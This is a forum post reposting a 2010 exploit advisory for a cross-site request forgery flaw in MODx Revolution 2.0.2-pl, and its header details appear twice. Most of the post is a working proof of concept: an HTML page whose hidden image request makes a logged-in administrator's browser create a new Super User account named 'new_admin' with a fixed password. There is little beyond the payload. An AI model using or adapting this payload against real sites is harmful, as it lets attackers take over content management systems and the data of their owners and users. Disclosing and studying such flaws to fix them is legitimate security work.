MODx Revolution 2.0.2-pl Cross-site Request Forgery
Page 1 of 1
MODx Revolution 2.0.2-pl Cross-site Request Forgery
Software:- MODx Revolution 2.0.2-pl
Vulnerability:- Cross-site Request Forgery
Tested On:- Windows Vista + XAMPP
Date:- 9/28/2010
Description:-
A vulnerability in MODx Revolution 2.0.2-pl can be exploited to create a new admin.
Proof of Concept:-
Vulnerability:- Cross-site Request Forgery
Tested On:- Windows Vista + XAMPP
Date:- 9/28/2010
Description:-
A vulnerability in MODx Revolution 2.0.2-pl can be exploited to create a new admin.
Proof of Concept:-
- Code:
<html>
<body>
<img src="http://localhost/modx/connectors/security/user.php?action=create&modx-ab-stay=&groups=%5B%7B%22usergroup%22%3A%221%22%2C%22role%22%3A%222%22%2C%22member%22%3A%22%22%2C%22rolename%22%3A%22Super%20User%22%2C%22name%22%3A%22Administrator%22%2C%22menu%22%3Anull%7D%5D&extended=%7B%7D&HTTP_MODAUTH=modx4ca298fc3d92e9.21874888&id=0&newpassword=false&modx-user-fs-newpassword-checkbox=on&passwordnotifymethod=s&passwordgenmethod=spec&specifiedpassword=Password1&confirmpassword=Password1&username=new_admin&active=1&fullname=&email=x%40x.com&phone=&mobilephone=&address=&city=&fax=&state=&zip=&country=&website=&dob=&gender=&comment=&failedlogincount=&blockeduntil=&blockedafter=&extended_name=&extended_value=&extended_id=" />
</body>
</html>
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» Webmatic 3.0.3 Multiple cross.site scripting
» Cross Site Scripting (XSS) at User-Agent
» Cross-Site Scripting Still Most Common Web Vulnerability
» XSS-Proxy Cross Site Scripting Attack Tool
» XSS (Cross Site Scripting) Prevention Cheat Sheet
» Cross Site Scripting (XSS) at User-Agent
» Cross-Site Scripting Still Most Common Web Vulnerability
» XSS-Proxy Cross Site Scripting Attack Tool
» XSS (Cross Site Scripting) Prevention Cheat Sheet
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|